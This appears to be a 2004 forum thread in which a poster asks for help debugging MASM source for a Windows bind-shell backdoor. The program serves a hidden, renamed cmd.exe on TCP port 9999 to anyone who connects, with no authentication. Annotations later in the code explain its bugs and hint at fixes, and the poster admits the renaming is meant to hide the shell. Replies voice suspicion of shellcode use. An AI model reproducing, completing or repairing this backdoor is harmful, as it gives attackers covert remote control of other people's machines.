I wrote a program that binds cmd.exe to TCP port 9999 (the session logic is adapted from nc.exe), but it fails. Can anyone help? Thank you!
; Bind-shell listener in 32-bit MASM (flat model, stdcall).
; It listens on TCP_PORT on every interface with no authentication or
; source filtering, and gives each accepted client a hidden console process
; whose stdin/stdout/stderr are bridged to the socket by two pump threads
; (see _doexec). Anyone who can reach the port gets a shell running with
; the rights of whoever started this program.
; NOTE(review): the include paths and the executable path below contain no
; directory separators; presumably the backslashes were stripped when the
; listing was posted (e.g. \masm32\include\windows.inc) -- confirm before
; assembling.
.386
.model flat,stdcall
option casemap :none
include masm32includewindows.inc
include masm32includeuser32.inc
include masm32includekernel32.inc
include masm32includeshlwapi.inc
includelib masm32libshlwapi.lib
includelib masm32libuser32.lib
includelib masm32libkernel32.lib
include masm32includewsock32.inc
includelib masm32libwsock32.lib

; Listening port; hard-coded, no run-time override.
TCP_PORT equ 9999

; Defined but never referenced: every I/O buffer in the pump threads is a
; single-byte local, so this constant has no effect on how much data is
; read or sent per iteration (see _SessionReadShellThreadFn).
BUFFER_SIZE equ 200
; Per-client session state. There is exactly one global instance
; (stSession), shared by both pump threads, so only one client session
; can exist at a time.
SESSION STRUCT
hReadPipe dd ?         ; parent's read end of the pipe carrying the child's stdout/stderr
hWritePipe dd ?        ; parent's write end of the pipe feeding the child's stdin
hProcess dd ?          ; handle of the spawned shell process
sClientSocket SOCKET ? ; accepted client socket
hReadShellThread dd ?  ; thread pumping pipe -> socket
hWriteShellThread dd ? ; thread pumping socket -> pipe
SESSION ENDS

.const
; Program launched for each client. The author states this is cmd.exe
; renamed (see the discussion below). Separators missing as noted above.
szCmd db "C:WINNTsystem32zlyi.EXE",0
; Client input that ends a session: "exit" followed by CR LF (6 bytes).
szExit db "exit",0dh,0ah,0
szSuc db 'sucess',0 ;for debug (never referenced in this listing)
szErr1 db 'createprocess fail',0 ;for debug (shown on CreatePipe and listen failure, never on CreateProcess failure)
szErr2 db 'accept fail',0 ;for debug
.data?
hShellStdinPipe dd ?  ; child-side read end of the stdin pipe (created inheritable)
hShellStdoutPipe dd ? ; child-side write end of the stdout pipe (created inheritable)
hChildStdinRd dd ?    ; unused in this listing
stSin sockaddr_in <?> ; listening address, filled in at start
stSession SESSION <?> ; the single active session
stWsa WSADATA <?>
hSocket dd ?          ; listening socket
hcSocket dd ?         ; most recently accepted client socket
.code

;-----------------------------------------------------------------------
; _StartShell(hShellStdin, hShellStdout) -> eax = process handle
; Launches szCmd with a hidden window; the child's stdin comes from
; hShellStdin, and both its stdout and stderr from hShellStdout.
; CreateProcess is called with bInheritHandles=TRUE, so the child also
; receives every other inheritable handle of this process, not just the
; two pipe ends.
; NOTE(review): the CreateProcess result is never tested. On failure
; @stProcessInformation holds uninitialised stack, CloseHandle is called
; on garbage, and the garbage hProcess is returned and stored by the
; caller as stSession.hProcess. szErr1 ("createprocess fail") exists for
; this case but is not used here.
;-----------------------------------------------------------------------
_StartShell proc uses ebx edi hShellStdin,hShellStdout
local @stProcessInformation:PROCESS_INFORMATION
local @stSi:STARTUPINFO
local @hProcess
mov @hProcess,NULL
; STARTUPINFO is filled field by field rather than zeroed; fields not
; assigned here (e.g. dwXSize) keep whatever was on the stack. That is
; harmless only because the corresponding STARTF_* flags are not set below.
mov @stSi.cb,sizeof STARTUPINFO
mov @stSi.lpReserved,NULL
mov @stSi.lpTitle,NULL
mov @stSi.lpDesktop,NULL
mov @stSi.dwX,0
mov @stSi.dwY,0
mov @stSi.dwYSize,0
mov @stSi.wShowWindow,SW_HIDE
mov @stSi.lpReserved2,NULL
mov @stSi.cbReserved2,0
mov ebx,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
mov @stSi.dwFlags,ebx
push hShellStdout
pop @stSi.hStdOutput
push hShellStdin
pop @stSi.hStdInput
; stderr shares the stdout pipe, so the client sees both streams interleaved.
push hShellStdout
pop @stSi.hStdError

; Return value (eax) is not checked -- see header note.
invoke CreateProcess,NULL,addr szCmd,NULL,NULL,TRUE,0,
NULL,NULL,addr @stSi,addr @stProcessInformation


mov edi,@stProcessInformation.hProcess
mov @hProcess,edi
; The primary-thread handle is not needed; only the process handle is kept.
invoke CloseHandle,@stProcessInformation.hThread


mov eax,@hProcess
ret

_StartShell endp

;-----------------------------------------------------------------------
; _CreateSession() -> eax = TRUE on the success path
; Creates the two anonymous pipes (child stdout -> stSession.hReadPipe,
; stSession.hWritePipe -> child stdin), spawns the shell via _StartShell,
; and closes the child-side pipe ends in this process.
; NOTE(review): both CreatePipe calls use bInheritHandle=TRUE, which
; marks BOTH ends of each pipe inheritable, and _StartShell passes
; bInheritHandles=TRUE; so as far as I can tell the parent's own ends
; (hReadPipe/hWritePipe) are inherited by the child as well.
; NOTE(review): there is no failure return. If either CreatePipe fails
; the code reaches "endp" without a "ret" and execution falls off the end
; of the procedure into whatever follows it; FALSE is never returned, and
; _doexec does not check the result anyway. The MessageBox on the first
; failure also blocks this (listener) thread until it is dismissed.
;-----------------------------------------------------------------------
_CreateSession proc

local @stSecurityAttributes:SECURITY_ATTRIBUTES

invoke RtlZeroMemory,addr stSession,sizeof stSession


mov @stSecurityAttributes.nLength,sizeof SECURITY_ATTRIBUTES
xor eax,eax
mov @stSecurityAttributes.lpSecurityDescriptor,eax
mov @stSecurityAttributes.bInheritHandle,TRUE
; Pipe 1: child writes stdout/stderr into hShellStdoutPipe, we read from hReadPipe.
invoke CreatePipe,addr stSession.hReadPipe,addr hShellStdoutPipe,
addr @stSecurityAttributes,0

.if eax==NULL
; Error text is misleading here: this is a CreatePipe failure, not CreateProcess.
invoke MessageBox,NULL,addr szErr1,NULL,MB_OK or MB_ICONWARNING
.else
; Pipe 2: we write to hWritePipe, child reads stdin from hShellStdinPipe.
invoke CreatePipe,addr hShellStdinPipe,addr stSession.hWritePipe,
addr @stSecurityAttributes,0
; Failure of the second pipe is silent and also falls off the end (see header).
.if eax!=NULL

invoke _StartShell,hShellStdinPipe,hShellStdoutPipe
; Whatever _StartShell returns is stored unchecked (garbage if CreateProcess failed).
mov stSession.hProcess,eax
; Drop our copies of the child-side ends so only the child holds them.
invoke CloseHandle,hShellStdinPipe
invoke CloseHandle,hShellStdoutPipe
mov eax,TRUE
ret
.endif
.endif

_CreateSession endp

;-----------------------------------------------------------------------
; _SessionReadShellThreadFn -- pump thread: shell stdout pipe -> client socket
; Polls stSession.hReadPipe with PeekNamedPipe, reads what is available,
; and forwards it with send(). Intended to turn a bare LF into CR LF on
; the way out (LF preceded by something other than CR gets a CR inserted).
; NOTE(review): @Buffer and @Buffer2 are declared as ONE BYTE each
; (":byte", no element count), so "sizeof @Buffer" is 1 and at most one
; byte is peeked/read per iteration; BUFFER_SIZE is never used. Inside
; the loop neither buffer is indexed by ecx/edx -- every iteration reads
; @Buffer byte 0 and overwrites @Buffer2 byte 0 -- so the CR inserted for
; an LF is immediately overwritten by the LF itself, while edx still
; counts 2. send() is then asked for @BytesToWrite (up to 2) bytes from
; a 1-byte local, i.e. it reads one byte past @Buffer2 on the stack.
; For the CR/LF logic to work, both buffers need an element count and the
; loop needs to address @Buffer[ecx] / @Buffer2[edx].
;-----------------------------------------------------------------------
_SessionReadShellThreadFn proc uses ebx ecx
local @Buffer:byte
local @Buffer2:byte
local @BytesRead
local @BytesToWrite
.while TRUE
; Non-blocking check so the thread can exit when the pipe breaks (eax==0).
invoke PeekNamedPipe,stSession.hReadPipe,addr @Buffer,sizeof @Buffer,
addr @BytesRead,NULL,NULL
.break .if eax==NULL
.if @BytesRead>0
invoke ReadFile,stSession.hReadPipe,addr @Buffer,sizeof @Buffer,
addr @BytesRead,NULL
.else
invoke Sleep,50
.continue
.endif
; eax is zeroed here, so ah (the "previous byte") is 0 on the first pass.
xor eax,eax
xor ecx,ecx
xor edx,edx
mov ebx,@BytesRead
; ecx = input index, edx = output length; neither is used as an index below.
.while ecx<ebx
mov al,@Buffer
; al = current byte, ah = previous byte (set at the bottom of the loop).
.if al==0ah && ah!=0dh

mov @Buffer2,0dh
.endif

mov ah,@Buffer
mov @Buffer2,ah
inc edx
inc ecx
.endw
mov @BytesToWrite,edx
; Reads @BytesToWrite bytes starting at a 1-byte local (see header note).
invoke send,stSession.sClientSocket,addr @Buffer2,@BytesToWrite,0
; Exit on socket error or closed connection; _doexec tears the session down.
.break .if eax<=0
.endw
invoke ExitThread,0

_SessionReadShellThreadFn endp

;-----------------------------------------------------------------------
; _SessionWriteShellThreadFn -- pump thread: client socket -> shell stdin pipe
; Receives from the client one byte at a time, translates CR to LF, and on
; each line end writes the accumulated input to stSession.hWritePipe.
; Exits the thread when the client sends the szExit line.
; NOTE(review), defects visible in this listing:
;  * recv() is passed "@RecvBuffer" by value -- the byte's contents, not
;    its address (compare "addr @Buffer" in the WriteFile call below), so
;    recv has no valid buffer to fill.
;  * Only eax==0 (orderly close) leaves the loop; a SOCKET_ERROR result
;    (-1) keeps looping with stale buffer contents.
;  * @RecvBuffer and @Buffer hold one byte each. A CR does not append an
;    LF, it replaces @Buffer with LF while ebx is bumped twice. ebx is
;    never reset (only the unused @BufferCnt is), so WriteFile is asked
;    for the running byte count since thread start, read from a 1-byte
;    local -- it walks further up the stack on every line.
;  * The "exit" check compares 6 bytes (szExit incl. CR LF) against the
;    single-byte @Buffer, so it reads past the local and can only match
;    by accident.
;  * There is no ret/ExitThread after the loop: after ".break" execution
;    falls off the end of the procedure into the code that follows it.
;  * @EchoBuffer, @EchoCnt and @TossCnt are declared/initialised but never used.
;-----------------------------------------------------------------------
_SessionWriteShellThreadFn proc uses ebx

local @RecvBuffer[1]:byte
local @Buffer:byte
local @EchoBuffer[5]:byte
local @BytesWritten
local @BufferCnt
local @EchoCnt
local @TossCnt
; ebx = number of bytes staged for the next WriteFile (callee-saved under
; stdcall, so it survives the invoke calls below).
xor ebx,ebx
mov @TossCnt,ebx
mov @BufferCnt,ebx
.while TRUE
; Missing "addr": passes the buffer byte, not a pointer (see header).
invoke recv,stSession.sClientSocket,@RecvBuffer,
sizeof @RecvBuffer,0
.break .if eax==NULL
mov ah,@RecvBuffer[0]
mov @Buffer,ah
inc ebx
; CR -> LF translation; overwrites rather than appends (see header).
.if ah==0dh
mov @Buffer,0ah
inc ebx
.endif
; StrCmpNI returns 0 on a (case-insensitive) match of the first 6 bytes.
invoke StrCmpNI,addr @Buffer,addr szExit,6
.if eax==NULL
invoke ExitThread,0
.endif
mov ah,@RecvBuffer[0]
; Flush to the shell only at end of line.
.if ah==0dh || ah==0ah

; Length ebx is the cumulative count, source is a 1-byte local (see header).
invoke WriteFile,stSession.hWritePipe,addr @Buffer,
ebx,addr @BytesWritten,NULL
.break .if eax==NULL
mov @BufferCnt,0

.endif
.endw

_SessionWriteShellThreadFn endp

;-----------------------------------------------------------------------
; _doexec(_hClientsocket) -> eax = TRUE when the session ended, FALSE if a
; pump thread could not be created
; Runs one client session to completion: spawns the shell (_CreateSession),
; starts the two pump threads, blocks until the first of {read thread,
; write thread, shell process} finishes, then kills the other two and
; closes everything. Blocks the caller for the life of the session, so the
; accept loop in start serves one client at a time.
; NOTE(review), defects visible in this listing:
;  * The _CreateSession result is ignored.
;  * On the two early FALSE returns the shell process started by
;    _CreateSession keeps running and the client socket is never closed.
;  * In the second failure branch TerminateThread is called on
;    hWriteShellThread, which is the NULL handle that just failed;
;    presumably hReadShellThread was meant.
;  * @HandleArray[1] and @HandleArray[2]: in MASM a bracketed constant on a
;    local is a BYTE displacement, so these three pops overlap each other
;    and WaitForMultipleObjects is handed a corrupt handle table.
;    Presumably [4] and [8] were meant (or use a typed dword array).
;  * In the third wait branch TerminateProcess is called with a thread
;    handle (hWriteShellThread); TerminateThread was presumably meant.
;  * DisconnectNamedPipe is a server-side named-pipe call; hReadPipe and
;    hWritePipe are anonymous-pipe handles from CreatePipe, so these two
;    calls have no meaningful effect.
;  * TerminateThread/TerminateProcess are abrupt: the victims get no
;    chance to release anything they hold -- acceptable here only because
;    the threads own nothing but their stack.
;-----------------------------------------------------------------------
_doexec proc uses ebx _hClientsocket

local @stSecurityAttributes:SECURITY_ATTRIBUTES
local @ThreadId
local @HandleArray[3]

; Return value not checked (see header).
invoke _CreateSession

mov @stSecurityAttributes.nLength,sizeof SECURITY_ATTRIBUTES
mov @stSecurityAttributes.lpSecurityDescriptor,NULL
; Thread handles are deliberately non-inheritable.
mov @stSecurityAttributes.bInheritHandle,FALSE
mov ebx,_hClientsocket
mov stSession.sClientSocket,ebx
; Pump 1: shell stdout pipe -> socket.
invoke CreateThread,addr @stSecurityAttributes,0,
_SessionReadShellThreadFn,NULL,0,
addr @ThreadId
mov stSession.hReadShellThread,eax
.if eax==NULL

; Shell process and client socket are leaked here (see header).
mov stSession.sClientSocket,INVALID_SOCKET
mov eax,FALSE
ret
.endif
; Pump 2: socket -> shell stdin pipe.
invoke CreateThread,addr @stSecurityAttributes,0,
_SessionWriteShellThreadFn,NULL,0,
addr @ThreadId
mov stSession.hWriteShellThread,eax
.if eax==NULL

mov stSession.sClientSocket,INVALID_SOCKET
; Wrong handle: hWriteShellThread is NULL at this point (see header).
invoke TerminateThread,stSession.hWriteShellThread,0
mov eax,FALSE
ret
.endif
; Byte displacements, not element indices -- the three stores overlap (see header).
push stSession.hReadShellThread
pop @HandleArray[0]
push stSession.hWriteShellThread
pop @HandleArray[1]
push stSession.hProcess
pop @HandleArray[2]
; bWaitAll=FALSE: return as soon as any one of the three is signalled.
invoke WaitForMultipleObjects,3,addr @HandleArray,FALSE,INFINITE
.if eax==WAIT_OBJECT_0+0
; Read thread ended (socket closed/error): kill writer and shell.
invoke TerminateThread,stSession.hWriteShellThread,0
invoke TerminateProcess,stSession.hProcess,1
.elseif eax==WAIT_OBJECT_0+1
; Write thread ended ("exit" or pipe error): kill reader and shell.
invoke TerminateThread,stSession.hReadShellThread,0
invoke TerminateProcess,stSession.hProcess,1
.elseif eax==WAIT_OBJECT_0+2
; Shell exited on its own: kill both pumps.
invoke TerminateThread,stSession.hReadShellThread,0
; Thread handle passed to TerminateProcess (see header).
invoke TerminateProcess,stSession.hWriteShellThread,0

.endif
invoke closesocket,stSession.sClientSocket
; DisconnectNamedPipe on anonymous pipes (see header); the CloseHandle
; calls are what actually release them.
invoke DisconnectNamedPipe,stSession.hReadPipe
invoke CloseHandle,stSession.hReadPipe
invoke DisconnectNamedPipe,stSession.hWritePipe
invoke CloseHandle,stSession.hWritePipe
invoke CloseHandle,stSession.hReadShellThread
invoke CloseHandle,stSession.hWriteShellThread
invoke CloseHandle,stSession.hProcess
mov eax,TRUE
ret

_doexec endp
;-----------------------------------------------------------------------
; Entry point. Brings up Winsock 1.1, binds a TCP listener to TCP_PORT on
; INADDR_ANY (every interface, no authentication, no peer filtering), and
; serves accepted clients one after another through _doexec, which blocks
; for the whole session.
; NOTE(review): the results of socket() and bind() are never tested; only
; listen() is, and a bind failure (e.g. port already in use) would surface
; there -- reported with the unrelated "createprocess fail" string. After
; that MessageBox the code continues into the accept loop regardless.
; On accept failure, closesocket is also called on hcSocket, which is
; still 0 if no client was ever accepted.
;-----------------------------------------------------------------------
start:
; 101h = Winsock version 1.1.
invoke WSAStartup,101h,addr stWsa
; Unchecked: eax may be INVALID_SOCKET.
invoke socket,AF_INET,SOCK_STREAM,0
mov hSocket,eax
invoke RtlZeroMemory,addr stSin,sizeof stSin
; htons returns the network-order port in ax.
invoke htons,TCP_PORT
mov stSin.sin_port,ax
mov stSin.sin_family,AF_INET
mov stSin.sin_addr,INADDR_ANY
; Unchecked: a bind failure is only noticed indirectly via listen below.
invoke bind,hSocket,addr stSin,sizeof stSin
; Backlog of 1; sessions are handled sequentially anyway.
invoke listen,hSocket,1
.if eax==SOCKET_ERROR
; Misleading message text for a listen/bind failure; execution continues.
invoke MessageBox,NULL,addr szErr1,NULL,MB_OK or MB_ICONWARNING
.endif

.while TRUE
; Peer address is discarded (NULL, NULL): nothing records who connected.
invoke accept,hSocket,NULL,NULL
.if eax==INVALID_SOCKET
invoke MessageBox,NULL,addr szErr2,NULL,MB_OK or MB_ICONWARNING

jmp exit
.else

mov hcSocket,eax
; Blocks until this client's session is over.
invoke _doexec,hcSocket
.endif
.endw
exit:
invoke closesocket,hSocket
; hcSocket may still be 0 here (see header).
invoke closesocket,hcSocket
invoke WSACleanup
invoke ExitProcess,NULL

end start
Posted on 2004-08-16 03:51:41 by
"For security" I renamed cmd.exe to zlyi.exe.
Posted on 2004-08-16 03:53:04 by
Hrm, "for security" - you mean so people won't see cmd.exe in their process list and realize they're running shellcode?
Posted on 2004-08-16 06:07:31 by f0dder
When I write a program, I write it part by part and test each part as I go. In your case you wrote an entire program (so you must know exactly what you are doing, or you could not have written it), yet you have not the slightest idea why it doesn't work. Interesting...
Posted on 2004-08-16 06:30:28 by Mbee
Some shellcode depends on cmd.exe, net.exe or net1.exe, so I renamed it.
I have debugged it...
Posted on 2004-08-16 19:14:59 by